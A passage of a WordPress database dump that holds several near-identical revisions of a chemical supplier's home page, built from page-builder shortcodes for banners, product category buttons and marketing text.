span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:00:47', '2016-09-11 16:00:47', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1501, 1, '2016-09-11 16:02:39', '2016-09-11 16:02:39', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:02:39', '2016-09-11 16:02:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1502, 1, '2016-09-11 16:05:00', '2016-09-11 16:05:00', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="0px" bg_color="white" text_color="white" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:05:00', '2016-09-11 16:05:00', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1503, 1, '2016-09-11 16:05:29', '2016-09-11 16:05:29', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="0px" bg_color="white" text_color="white" animated="fadeIn" ]\r\n\r\n[/ux_banner]\r\n\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:05:29', '2016-09-11 16:05:29', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1504, 1, '2016-09-11 16:06:08', '2016-09-11 16:06:08', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[ux_banner height="3px" bg_color="white" text_color="white" animated="fadeIn" ]\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner]\r\n\r\n\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:06:08', '2016-09-11 16:06:08', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1505, 1, '2016-09-11 16:06:33', '2016-09-11 16:06:33', '[ux_banner_grid height="400px" padding="0px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n<br/>\r\n\r\n\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="chemicals/medical-chemicals/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" bg_color="white"  text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-11 16:06:33', '2016-09-11 16:06:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
